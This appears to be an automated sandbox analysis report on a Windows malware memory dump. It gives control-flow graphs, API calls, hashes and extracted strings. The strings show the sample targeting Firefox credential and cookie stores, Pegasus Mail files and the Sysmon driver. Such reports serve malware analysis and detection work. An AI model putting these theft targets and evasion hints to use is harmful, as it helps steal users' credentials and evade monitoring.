                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: Ku^%$Ku^%$Y=`$Y=`
                                                          • API String ID: 4038537762-3617128223
                                                          • Opcode ID: 8aca2622c3c3d1db70070bb2a5585c4558611a8a3d103d468629aeb63b1ff0ca
                                                          • Instruction ID: 9c9fa2152e9cc94146e123e662ad7e189f6101f2fbba187f29f17e96b34d8480
                                                          • Opcode Fuzzy Hash: 8aca2622c3c3d1db70070bb2a5585c4558611a8a3d103d468629aeb63b1ff0ca
                                                          • Instruction Fuzzy Hash: 72F11AB1D0010A9BCF249E9898815BE7A70AB54304F264D3BE517FA3E4D37CCD619B5B
                                                          Function 0042B9C5 Relevance: 16.7, Strings: 13, Instructions: 436COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5516 42b9c5-42b9ce 5517 42b9d5-42b9dd 5516->5517 5518 42ba34-42ba39 5517->5518 5519 42b9df-42b9e4 5517->5519 5520 42bb28-42bb2d 5518->5520 5521 42ba3f-42ba44 5518->5521 5522 42bad0-42bad5 5519->5522 5523 42b9ea-42b9ef 5519->5523 5530 42bb33-42bb38 5520->5530 5531 42bc20-42bc25 5520->5531 5528 42ba4a-42ba4f 5521->5528 5529 42bb9c-42bba1 5521->5529 5526 42badb-42bae0 5522->5526 5527 42bbcf-42bbd4 5522->5527 5524 42b9f5-42b9fa 5523->5524 5525 42bb59-42bb5e 5523->5525 5532 42ba00-42ba05 5524->5532 5533 42bc6c-42bc71 5524->5533 5536 42bd40-42bd45 5525->5536 5537 42bb64-42bb69 5525->5537 5538 42bae6-42baeb 5526->5538 5539 42bcdd-42bce2 5526->5539 5544 42bdba-42bdbf 5527->5544 5545 42bbda-42bbdf 5527->5545 5542 42ba55-42ba5a 5528->5542 5543 42bcab-42bcb0 5528->5543 5540 42bba7-42bbac 5529->5540 5541 42bd6e-42bd73 5529->5541 5546 42bb3e-42bb43 5530->5546 5547 42bd0d-42bd12 5530->5547 5534 42bc2b-42bc30 5531->5534 5535 42bdff-42be04 5531->5535 5564 42be21-42be81 call 40e14e * 4 5532->5564 5565 42ba0b-42ba10 5532->5565 5554 42bf87-42bfa6 call 42ca0d 5533->5554 5555 42bc77-42bc7c 5533->5555 5550 42bc36-42bc3b 5534->5550 5551 42bf6c-42bf77 5534->5551 5552 42be0a-42be0f 5535->5552 5553 42c08d-42c0b0 5535->5553 5570 42bd4b-42bd50 5536->5570 5571 42c018-42c027 5536->5571 5566 42bf09-42bf29 5537->5566 5567 42bb6f-42bb74 5537->5567 5556 42baf1-42baf6 5538->5556 5557 42be9f-42bec5 call 42ad82 5538->5557 5562 42bfd2-42bfe8 5539->5562 5563 42bce8-42bced 5539->5563 5572 42bbb2-42bbb7 5540->5572 5573 42bf39-42bf5c 5540->5573 5574 42bd79-42bd7e 5541->5574 5575 42c02c-42c033 5541->5575 5576 42ba60-42ba65 5542->5576 5577 42be86-42be8f 5542->5577 5558 42bcb6-42bcbb 5543->5558 5559 42bfab-42bfcd call 42b9c5 5543->5559 5548 42bdc5-42bdca 5544->5548 5549 42c038-42c043 5544->5549 5578 42bbe5-42bbea 5545->5578 5579 42c05e-42c084 5545->5579 5560 42bed5-42bef9 5546->5560 5561 42bb49-42bb4e 5546->5561 5568 42bd18-42bd1d 5547->5568 5569 42bfed-42c009 5547->5569 5548->5517 5580 42bdd0-42bdef call 42b9ae 5548->5580 5585 42c04f 5549->5585 5601 42c045-42c04d 5549->5601 5550->5517 5598 42bc41-42bc61 5550->5598 5586 42c010-42c013 5551->5586 5595 42bf7d-42bf82 5551->5595 5552->5517 5581 42be15-42be1c 5552->5581 5604 42c0b7-42c0ba 5553->5604 5605 42c0b2 5553->5605 5554->5517 5555->5517 5600 42bc82-42bca6 call 42b9c5 5555->5600 5556->5517 5582 42bafc-42bb11 call 40b7bb 5556->5582 5557->5586 5630 42becb-42bed0 5557->5630 5558->5517 5602 42bcc1-42bcd8 call 447e24 5558->5602 5559->5517 5560->5586 5590 42beff-42bf04 5560->5590 5584 42bb54 5561->5584 5561->5585 5562->5517 5563->5517 5606 42bcf3-42bd08 5563->5606 5564->5517 5607 42ba16-42ba32 call 438e28 5565->5607 5608 42c0bf-42c0c4 5565->5608 5566->5586 5592 42bf2f-42bf34 5566->5592 5567->5517 5589 42bb7a-42bb97 5567->5589 5568->5517 5609 42bd23-42bd3b 5568->5609 5569->5586 5599 42c00b 5569->5599 5570->5517 5610 42bd56-42bd69 5570->5610 5571->5517 5572->5517 5591 42bbbd-42bbca 5572->5591 5573->5586 5593 42bf62-42bf67 5573->5593 5574->5517 5611 42bd84-42bdaf call 42b9c5 5574->5611 5575->5517 5576->5517 5612 42ba6b-42bacb call 40e14e * 4 5576->5612 5577->5586 5587 42be95-42be9a 5577->5587 5578->5517 5594 42bbf0-42bc15 call 42ca0d 5578->5594 5603 42c086-42c08b 5579->5603 5579->5604 5580->5586 5638 42bdf5-42bdfa 5580->5638 5581->5517 5645 42bb16-42bb23 5582->5645 5584->5517 5621 42c050 5585->5621 5586->5517 5587->5586 5589->5517 5590->5586 5591->5517 5592->5586 5593->5586 5594->5592 5641 42bc1b 5594->5641 5595->5586 5598->5593 5619 42bc67 5598->5619 5599->5586 5600->5517 5601->5579 5601->5585 5602->5517 5603->5604 5604->5517 5605->5604 5606->5517 5607->5517 5608->5517 5624 42c0ca-42c0d9 call 447a80 5608->5624 5609->5517 5610->5517 5611->5593 5643 42bdb5 5611->5643 5612->5517 5619->5586 5621->5621 5630->5586 5638->5586 5641->5586 5643->5586 5645->5517
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: *.CNM$*.PM$*.PMF$*.PML$*.PMN$*.USR$*.WPM$*CACHE.PM$C:\PMAIL$Ku^%$Ku^%$Mail Clients\Pegasus$kernel32.dll
                                                          • API String ID: 0-3904125897
                                                          • Opcode ID: c2af665f8e7a6a5fb5bf80d2b66eb56a303a312d12f5e083bf41e33716631812
                                                          • Instruction ID: 84dac617f37148c4bf89ffca1ba6cb6ddcd73cd34940f6261eccf690c7d83b59
                                                          • Opcode Fuzzy Hash: c2af665f8e7a6a5fb5bf80d2b66eb56a303a312d12f5e083bf41e33716631812
                                                          • Instruction Fuzzy Hash: E0E10BB1F0012A8BCF249E99A88167F7B74EB05354FA4052BE511EB361E77C8D409BDB
                                                          Function 0040A928 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 475stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5655 40a928-40a970 call 447047 call 438e28 5661 40a973-40a97b 5655->5661 5662 40a9f5-40a9fa 5661->5662 5663 40a97d-40a982 5661->5663 5666 40aa00-40aa05 5662->5666 5667 40aa93-40aa98 5662->5667 5664 40aa43-40aa48 5663->5664 5665 40a988-40a98d 5663->5665 5668 40ab86-40ab8b 5664->5668 5669 40aa4e-40aa53 5664->5669 5670 40a993-40a998 5665->5670 5671 40aaee-40aaf3 5665->5671 5674 40aa0b-40aa10 5666->5674 5675 40ab4c-40ab51 5666->5675 5672 40abb7-40abbc 5667->5672 5673 40aa9e-40aaa3 5667->5673 5684 40ab91-40ab96 5668->5684 5685 40ad0b-40ad10 5668->5685 5676 40aa59-40aa5e 5669->5676 5677 40ac3b-40ac40 5669->5677 5678 40abfe-40ac03 5670->5678 5679 40a99e-40a9a3 5670->5679 5688 40aca4-40aca9 5671->5688 5689 40aaf9-40aafe 5671->5689 5690 40ad42-40ad47 5672->5690 5691 40abc2-40abc7 5672->5691 5682 40ac73-40ac78 5673->5682 5683 40aaa9-40aaae 5673->5683 5686 40ac20-40ac25 5674->5686 5687 40aa16-40aa1b 5674->5687 5680 40acd4-40acd9 5675->5680 5681 40ab57-40ab5c 5675->5681 5692 40aa64-40aa69 5676->5692 5693 40ae1a-40ae25 5676->5693 5700 40b055-40b075 5677->5700 5701 40ac46-40ac4b 5677->5701 5694 40b010-40b017 call 447047 5678->5694 5695 40ac09-40ac0e 5678->5695 5708 40ad73-40ad84 5679->5708 5709 40a9a9-40a9ae 5679->5709 5710 40ae4c-40ae4f 5680->5710 5711 40acdf-40ace4 5680->5711 5712 40ab62-40ab67 5681->5712 5713 40af0a-40af24 5681->5713 5702 40b084-40b0ae call 438e28 5682->5702 5703 40ac7e-40ac83 5682->5703 5698 40ae90-40aea2 call 40a928 5683->5698 5699 40aab4-40aab9 5683->5699 5716 40ab9c-40aba1 5684->5716 5717 40af4e-40af66 5684->5717 5714 40ad16-40ad1b 5685->5714 5715 40b0bf-40b0e2 5685->5715 5696 40ac2b-40ac30 5686->5696 5697 40b02e-40b050 lstrcatW lstrlenW 5686->5697 5718 40aa21-40aa26 5687->5718 5719 40adcf-40ae09 call 40b81c call 40a928 5687->5719 5706 40b0b3-40b0ba 5688->5706 5707 40acaf-40acb4 5688->5707 5704 40aeb1-40aee5 5689->5704 5705 40ab04-40ab09 5689->5705 5720 40b0f1-40b101 5690->5720 5721 40ad4d-40ad52 5690->5721 5722 40afb5-40afd9 5691->5722 5723 40abcd-40abd2 5691->5723 5748 40ae6d-40ae8b 5692->5748 5749 40aa6f-40aa74 5692->5749 5693->5710 5753 40ae27-40ae2f 5693->5753 5770 40b01c-40b029 5694->5770 5726 40ac14-40ac1b 5695->5726 5727 40b106-40b10b 5695->5727 5728 40ae61-40ae68 5696->5728 5729 40ac36 5696->5729 5697->5661 5750 40aea5-40aeac 5698->5750 5699->5750 5751 40aabf-40aac4 5699->5751 5734 40b077 5700->5734 5735 40b07c-40b07f 5700->5735 5701->5661 5730 40ac51-40ac6e lstrlenW 5701->5730 5702->5661 5703->5661 5731 40ac89-40ac9f call 447047 5703->5731 5742 40b0e9-40b0ec 5704->5742 5760 40aeeb-40aef0 5704->5760 5754 40aef5-40af05 5705->5754 5755 40ab0f-40ab14 5705->5755 5706->5661 5707->5661 5733 40acba-40accf lstrcatW 5707->5733 5746 40b009-40b00e 5708->5746 5747 40ad8a 5708->5747 5736 40a9b4-40a9b9 5709->5736 5737 40ad8f-40adbf call 40b129 call 40b7bb 5709->5737 5756 40ae50 5710->5756 5711->5661 5738 40acea-40acfb 5711->5738 5757 40af33-40af49 call 447047 5712->5757 5758 40ab6d-40ab72 5712->5758 5763 40af26 5713->5763 5764 40af2b-40af2e 5713->5764 5714->5661 5740 40ad21-40ad32 5714->5740 5741 40b0e4 5715->5741 5715->5742 5761 40aba7-40abac 5716->5761 5762 40af6b-40af9c NtCreateFile call 438e28 5716->5762 5717->5661 5743 40aa2c-40aa31 5718->5743 5744 40ae0e-40ae15 5718->5744 5719->5661 5720->5661 5721->5661 5745 40ad58-40ad6e call 447047 5721->5745 5722->5661 5724 40abd8-40abdd 5723->5724 5725 40afde-40b007 call 40a928 call 40b129 5723->5725 5724->5661 5765 40abe3-40abee 5724->5765 5725->5735 5725->5746 5726->5661 5727->5661 5777 40b111-40b118 5727->5777 5728->5661 5729->5661 5730->5661 5731->5661 5733->5661 5734->5735 5735->5661 5736->5661 5771 40a9bb-40a9e5 5736->5771 5737->5735 5807 40adc5-40adca 5737->5807 5738->5735 5772 40ad01-40ad06 5738->5772 5740->5735 5774 40ad38-40ad3d 5740->5774 5741->5742 5742->5661 5743->5661 5775 40aa37-40aa3e 5743->5775 5744->5661 5745->5661 5746->5735 5747->5735 5748->5661 5749->5661 5779 40aa7a-40aa8e 5749->5779 5750->5661 5751->5661 5780 40aaca-40aade 5751->5780 5753->5728 5782 40ae31-40ae47 5753->5782 5754->5661 5755->5661 5783 40ab1a-40ab3c 5755->5783 5756->5756 5757->5661 5758->5661 5784 40ab78-40ab81 5758->5784 5760->5742 5761->5782 5786 40abb2 5761->5786 5789 40afa1-40afb0 5762->5789 5763->5764 5764->5735 5765->5735 5787 40abf4-40abf9 5765->5787 5770->5661 5771->5735 5792 40a9eb-40a9f0 5771->5792 5772->5735 5774->5735 5775->5661 5794 40b11a-40b11c 5777->5794 5795 40b11e 5777->5795 5779->5661 5780->5735 5797 40aae4-40aae9 5780->5797 5782->5661 5783->5735 5799 40ab42-40ab47 5783->5799 5784->5750 5786->5661 5787->5735 5789->5661 5792->5735 5801 40b121-40b128 5794->5801 5795->5801 5797->5735 5799->5735 5807->5735
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,75570880,?,0040B7CA,0040C9F4,?,?,?), ref: 0040AC5E
                                                          • lstrcatW.KERNEL32(?,\??\,?,?,?,?,?,?,?,?,75570880,?,0040B7CA,0040C9F4,?,?), ref: 0040ACC2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcatlstrlen
                                                          • String ID: \??\$kernel32.dll$ntdll.dll
                                                          • API String ID: 1475610065-320376045
                                                          • Opcode ID: 59cd2d1ccfa00f4e6d6c0bc67caa238be280e9eaa5e7935e3225b88f4da3e326
                                                          • Instruction ID: cf05d70ef52a95d5e776fd44e962e356ae6502797ff445894325f4a97f5a2809
                                                          • Opcode Fuzzy Hash: 59cd2d1ccfa00f4e6d6c0bc67caa238be280e9eaa5e7935e3225b88f4da3e326
                                                          • Instruction Fuzzy Hash: E302C5B1E443198ADF288A58C842ABFB670EB14310F25493BE515FB3E0D3798D519B9F
                                                          Function 0042FD35 Relevance: 14.1, Strings: 11, Instructions: 308COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5960 42fd35-42fd3e 5961 42fd45-42fd4d 5960->5961 5962 42fdb5-42fdba 5961->5962 5963 42fd4f-42fd54 5961->5963 5966 42fe70-42fe75 5962->5966 5967 42fdc0-42fdc5 5962->5967 5964 42fe25-42fe2a 5963->5964 5965 42fd5a-42fd5f 5963->5965 5972 42ff30-42ff35 5964->5972 5973 42fe30-42fe35 5964->5973 5970 42fec5-42feca 5965->5970 5971 42fd65-42fd6a 5965->5971 5974 42ff83-42ff88 5966->5974 5975 42fe7b-42fe80 5966->5975 5968 42ff0a-42ff0f 5967->5968 5969 42fdcb-42fdd0 5967->5969 5986 430130-43016d call 42fd35 call 430228 5968->5986 5987 42ff15-42ff1a 5968->5987 5976 42fdd6-42fddb 5969->5976 5977 430004-43002c call 42f278 5969->5977 5978 42fed0-42fed5 5970->5978 5979 4300e4-4300ef 5970->5979 5982 42fd70-42fd75 5971->5982 5983 42ffcc-42ffd3 5971->5983 5988 430195-4301b6 5972->5988 5989 42ff3b-42ff40 5972->5989 5984 430051-430075 call 42f278 5973->5984 5985 42fe3b-42fe40 5973->5985 5980 4301bf-4301d6 5974->5980 5981 42ff8e-42ff93 5974->5981 5990 42fe86-42fe8b 5975->5990 5991 430095-4300a0 5975->5991 6008 42fde1-42fde6 5976->6008 6009 430037-43004c 5976->6009 6026 43018e-430193 5977->6026 6032 430032 5977->6032 5995 43010a-43012b 5978->5995 5996 42fedb-42fee0 5978->5996 6001 4300f1-4300f9 5979->6001 6002 4300fb 5979->6002 5998 4301dd-4301e0 5980->5998 6014 4301d8 5980->6014 5981->5961 6010 42ff99-42ffbc 5981->6010 5999 42fd7b-42fd80 5982->5999 6000 42ffd8-42fff9 call 42f278 5982->6000 5983->5961 5984->5961 6012 42fe46-42fe4b 5985->6012 6013 43007a-430090 5985->6013 5986->5998 6048 43016f-430174 5986->6048 6003 42ff20-42ff25 5987->6003 6004 430176-43018c 5987->6004 5988->5998 6011 4301b8-4301bd 5988->6011 6006 42ff46-42ff78 call 42f278 5989->6006 6007 4301e5-4301ea 5989->6007 5992 4300b0-4300d4 5990->5992 5993 42fe91-42fe96 5990->5993 5997 4300a6-4300ab 5991->5997 5991->5998 5992->5998 6019 4300da-4300df 5992->6019 5993->5961 6016 42fe9c-42fec0 call 42fd35 5993->6016 5995->5961 5996->5961 6018 42fee6-42ff05 call 42f278 5996->6018 5997->5998 5998->5961 5999->5961 6020 42fd82-42fd9e call 42f625 * 2 5999->6020 6000->6048 6049 42ffff 6000->6049 6001->5995 6001->6002 6021 4300fc 6002->6021 6003->6002 6022 42ff2b 6003->6022 6004->5998 6004->6026 6006->5997 6047 42ff7e 6006->6047 6007->5961 6030 4301f0-43021b call 42f625 * 3 6007->6030 6008->5961 6025 42fdec-42fe16 6008->6025 6009->5961 6010->5998 6027 42ffc2-42ffc7 6010->6027 6011->5998 6012->5961 6029 42fe51-42fe5c call 42f625 6012->6029 6013->5961 6014->5998 6016->5961 6018->5961 6019->5998 6055 42fda3-42fdb3 6020->6055 6021->6021 6022->5961 6038 42fe18 6025->6038 6039 42fe1d-42fe20 6025->6039 6026->5998 6027->5998 6050 42fe61-42fe6b 6029->6050 6057 430220-430227 6030->6057 6032->5998 6038->6039 6039->5961 6047->5998 6048->5998 6049->5998 6050->5961 6055->5961
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$cert9.db$cookies.sqlite$formhistory.sqlite$key4.db$logins.json$places.sqlite
                                                          • API String ID: 4038537762-2469458786
                                                          • Opcode ID: 5cc8e0385a1e201e213d2df3de3c9283c111f345cb6a958e47c3068638802ac2
                                                          • Instruction ID: d1eb3a7c9248dbe3af820f863548cf4fb9ed3ca77677979f9304c8b24649e330
                                                          • Opcode Fuzzy Hash: 5cc8e0385a1e201e213d2df3de3c9283c111f345cb6a958e47c3068638802ac2
                                                          • Instruction Fuzzy Hash: 9FB128B1E1012A97CF288E58A95567F7674AB45300FE4163BE816FB390E73DCA05878B
                                                          Function 004262A1 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 391libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 6193 4262a1-4262b8 6194 4262bc-4262c4 6193->6194 6195 4262c6-4262cb 6194->6195 6196 426335-42633a 6194->6196 6199 4262d1-4262d6 6195->6199 6200 42638a-42638f 6195->6200 6197 426340-426345 6196->6197 6198 4263f4-4263f9 6196->6198 6205 4264a5-4264aa 6197->6205 6206 42634b-426350 6197->6206 6203 426529-42652e 6198->6203 6204 4263ff-426404 6198->6204 6207 426448-42644d 6199->6207 6208 4262dc-4262e1 6199->6208 6201 4264e3-4264e8 6200->6201 6202 426395-42639a 6200->6202 6223 4266bb-4266c0 6201->6223 6224 4264ee-4264f3 6201->6224 6211 4263a0-4263a5 6202->6211 6212 4265ea-4265ef 6202->6212 6213 426534-426539 6203->6213 6214 4266ed-4266f2 6203->6214 6215 426616-42661b 6204->6215 6216 42640a-42640f 6204->6216 6217 4264b0-4264b5 6205->6217 6218 426675-42667a 6205->6218 6219 426356-42635b 6206->6219 6220 4265a4-4265a9 6206->6220 6209 426453-426458 6207->6209 6210 426648-42664d 6207->6210 6221 426582-426587 6208->6221 6222 4262e7-4262ec 6208->6222 6225 426824-426836 6209->6225 6226 42645e-426463 6209->6226 6235 426942-426959 6210->6235 6236 426653-426658 6210->6236 6241 42676a-426791 6211->6241 6242 4263ab-4263b0 6211->6242 6227 4265f5-4265fa 6212->6227 6228 426908-42690f 6212->6228 6243 4268c6-4268de 6213->6243 6244 42653f-426544 6213->6244 6249 4266f8-4266fd 6214->6249 6250 4269ae-4269cc call 4279e0 6214->6250 6229 426621-426626 6215->6229 6230 426914-426939 6215->6230 6247 4267d4-4267f3 call 422817 6216->6247 6248 426415-42641a 6216->6248 6231 426847-426862 RtlAdjustPrivilege call 4279e0 6217->6231 6232 4264bb-4264c0 6217->6232 6237 426680-426685 6218->6237 6238 42695e-42696d 6218->6238 6233 426361-426366 6219->6233 6234 4265de-4265e5 6219->6234 6253 4265af-4265b4 6220->6253 6254 4268fc-426903 6220->6254 6251 4268e3-4268f7 6221->6251 6252 42658d-426592 6221->6252 6255 4262f2-4262f7 6222->6255 6256 42670f-426719 6222->6256 6245 426972-42699f call 424c44 call 422177 6223->6245 6246 4266c6-4266cb 6223->6246 6239 4268a4-4268ab 6224->6239 6240 4264f9-4264fe 6224->6240 6225->6194 6273 42683b-426842 6226->6273 6274 426469-42646e 6226->6274 6227->6194 6258 426600-426611 GetPEB 6227->6258 6228->6194 6229->6194 6259 42662c-426643 call 43f000 6229->6259 6270 4269a6-4269a9 6230->6270 6283 42693b-426940 6230->6283 6303 426867-426872 6231->6303 6276 4264c6-4264cb 6232->6276 6277 426877-426894 6232->6277 6260 42673f-42675a 6233->6260 6261 42636c-426371 6233->6261 6234->6194 6235->6194 6236->6194 6262 42665e-426670 6236->6262 6237->6194 6263 42668b-4266ab call 426a42 call 41eba8 6237->6263 6238->6194 6239->6194 6279 4268b0-4268c1 6240->6279 6280 426504-426509 6240->6280 6241->6270 6272 426797-42679c 6241->6272 6264 4267a1-4267c4 6242->6264 6265 4263b6-4263bb 6242->6265 6243->6194 6281 4269d1-4269d6 6244->6281 6282 42654a-426572 call 424995 6244->6282 6245->6270 6329 4269a1 6245->6329 6246->6194 6266 4266d1-4266e8 6246->6266 6247->6270 6313 4267f9-4267fe 6247->6313 6267 426803-42681f 6248->6267 6268 426420-426425 6248->6268 6249->6194 6269 426703-42670a 6249->6269 6250->6194 6251->6194 6252->6194 6285 426598-42659f 6252->6285 6253->6194 6286 4265ba-4265d9 call 426a09 6253->6286 6254->6194 6287 426729-42673a 6255->6287 6288 4262fd-426302 6255->6288 6256->6270 6271 42671f-426724 6256->6271 6258->6194 6259->6194 6260->6270 6298 426760-426765 6260->6298 6261->6194 6294 426377-42637b 6261->6294 6262->6194 6263->6270 6331 4266b1-4266b6 6263->6331 6264->6270 6299 4267ca-4267cf 6264->6299 6265->6194 6296 4263c1-4263ef LoadLibraryA 6265->6296 6266->6194 6267->6194 6268->6194 6297 42642b-426443 call 41eba8 call 41f9a4 6268->6297 6269->6194 6270->6194 6271->6270 6272->6270 6273->6194 6274->6194 6300 426474-426495 call 41eb3f 6274->6300 6276->6194 6302 4264d1-4264de call 422817 6276->6302 6277->6270 6304 42689a-42689f 6277->6304 6279->6194 6280->6194 6305 42650f-426524 6280->6305 6281->6194 6292 4269dc-4269e3 6281->6292 6282->6270 6323 426578-42657d 6282->6323 6283->6270 6285->6194 6286->6234 6287->6194 6288->6194 6290 426304-42632a call 422817 call 4244e4 6288->6290 6290->6304 6333 426330 6290->6333 6318 42637e-426385 6294->6318 6296->6194 6297->6285 6298->6270 6299->6270 6300->6270 6328 42649b-4264a0 6300->6328 6302->6269 6303->6194 6304->6270 6305->6194 6313->6270 6318->6194 6323->6270 6328->6270 6329->6270 6331->6270 6333->6270
                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(fltl), ref: 004263DE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: A8r$SysmonDrv$dll$fltl$ib.d
                                                          • API String ID: 1029625771-1616023887
                                                          • Opcode ID: 2db2a4e5335f366ea46298763abcd9c468ba7e06b9ae091ed3480071e9d520ab
                                                          • Instruction ID: eb42a9731a47ced65949ee17454b9c50096d91694aa44b165600d0182d074a5f
                                                          • Opcode Fuzzy Hash: 2db2a4e5335f366ea46298763abcd9c468ba7e06b9ae091ed3480071e9d520ab
                                                          • Instruction Fuzzy Hash: E7E1D5B1709220DBCB24AB18E68572E76E5EB80304FA65D1FF485CB350D63DC9829B5B
                                                          Function 00402476 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 655COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: M0@$UL6T$VL6T
                                                          • API String ID: 0-769956738
                                                          • Opcode ID: 3f7b00bcc41dc9950e88c817e104c281ddb069482e9e35bb9bdcf7b3ae0a07f6
                                                          • Instruction ID: 5b652a97159c1cfdc4854cd4c98ad9d0b798284c57e6c6df073e9b00d242a01e
                                                          • Opcode Fuzzy Hash: 3f7b00bcc41dc9950e88c817e104c281ddb069482e9e35bb9bdcf7b3ae0a07f6
                                                          • Instruction Fuzzy Hash: 0032A871D1051B8BCF289A98878D57EB6B0AB54350B24063BE915FB3D0D3BCCE419B9B
                                                          Function 0040B129 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 375nativefileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 6767 40b129-40b139 6768 40b13c-40b144 6767->6768 6769 40b146-40b14b 6768->6769 6770 40b17e-40b183 6768->6770 6771 40b1b7-40b1bc 6769->6771 6772 40b14d-40b152 6769->6772 6773 40b215-40b21a 6770->6773 6774 40b189-40b18e 6770->6774 6775 40b1c2-40b1c7 6771->6775 6776 40b32c-40b331 6771->6776 6777 40b2a5-40b2aa 6772->6777 6778 40b158-40b15d 6772->6778 6779 40b220-40b225 6773->6779 6780 40b359-40b35e 6773->6780 6781 40b194-40b199 6774->6781 6782 40b2db-40b2e0 6774->6782 6785 40b4c7-40b4cc 6775->6785 6786 40b1cd-40b1d2 6775->6786 6783 40b646-40b65b 6776->6783 6784 40b337-40b33c 6776->6784 6789 40b2b0-40b2b5 6777->6789 6790 40b584-40b5a7 call 40a928 6777->6790 6791 40b163-40b168 6778->6791 6792 40b3c8-40b3cd 6778->6792 6795 40b4a9-40b4c2 6779->6795 6796 40b22b-40b230 6779->6796 6787 40b360-40b365 6780->6787 6788 40b395-40b3b8 6780->6788 6797 40b40f-40b414 6781->6797 6798 40b19f-40b1a4 6781->6798 6793 40b601-40b607 call 40a928 6782->6793 6794 40b2e6-40b2eb 6782->6794 6808 40b746-40b749 6783->6808 6817 40b661-40b666 6783->6817 6801 40b342-40b347 6784->6801 6802 40b66b-40b6a6 call 40b81c call 40a928 6784->6802 6824 40b4d2-40b4f3 6785->6824 6825 40b74e-40b753 6785->6825 6803 40b494-40b497 6786->6803 6804 40b1d8-40b1dd 6786->6804 6805 40b6ab-40b6ca 6787->6805 6806 40b36b-40b370 6787->6806 6788->6808 6809 40b3be-40b3c3 6788->6809 6818 40b5b2-40b5f1 call 40b81c call 40b7bb 6789->6818 6819 40b2bb-40b2c0 6789->6819 6790->6817 6861 40b5ad 6790->6861 6820 40b503-40b532 6791->6820 6821 40b16e-40b173 6791->6821 6810 40b6d3-40b6fc 6792->6810 6811 40b3d3-40b3d8 6792->6811 6848 40b60c-40b616 6793->6848 6822 40b2f1-40b2f6 6794->6822 6823 40b61b-40b641 call 438e28 6794->6823 6795->6768 6812 40b236-40b23b 6796->6812 6813 40b569-40b574 6796->6813 6815 40b710-40b73f call 40b129 6797->6815 6816 40b41a-40b41f 6797->6816 6799 40b541-40b55e 6798->6799 6800 40b1aa-40b1af 6798->6800 6841 40b741 6799->6841 6842 40b564 6799->6842 6839 40b1b5 6800->6839 6840 40b2cf-40b2d6 6800->6840 6801->6768 6828 40b34d-40b354 6801->6828 6802->6768 6834 40b498 6803->6834 6804->6768 6844 40b1e3-40b210 call 447047 call 447e24 6804->6844 6805->6808 6853 40b6cc-40b6d1 6805->6853 6806->6768 6830 40b376-40b381 6806->6830 6808->6768 6809->6808 6826 40b703-40b70b call 40b81c 6810->6826 6827 40b6fe 6810->6827 6811->6768 6832 40b3de-40b404 call 40b129 6811->6832 6812->6768 6847 40b241-40b295 call 40b129 call 40b81c 6812->6847 6813->6808 6843 40b57a-40b57f 6813->6843 6815->6808 6815->6841 6816->6768 6833 40b425-40b470 call 438e28 call 447e24 6816->6833 6817->6808 6818->6808 6882 40b5f7-40b5fc 6818->6882 6819->6768 6850 40b2c6-40b2cc 6819->6850 6837 40b534 6820->6837 6838 40b539-40b53c 6820->6838 6821->6768 6835 40b175-40b17c 6821->6835 6822->6768 6852 40b2fc-40b321 6822->6852 6823->6768 6824->6808 6836 40b4f9-40b4fe 6824->6836 6825->6768 6831 40b759-40b7ba NtReadFile call 438e28 NtClose 6825->6831 6826->6768 6827->6826 6828->6768 6830->6803 6856 40b387-40b38f 6830->6856 6832->6841 6875 40b40a 6832->6875 6886 40b475-40b48f 6833->6886 6834->6834 6835->6768 6836->6808 6837->6838 6838->6768 6839->6768 6840->6768 6841->6808 6842->6808 6843->6808 6844->6768 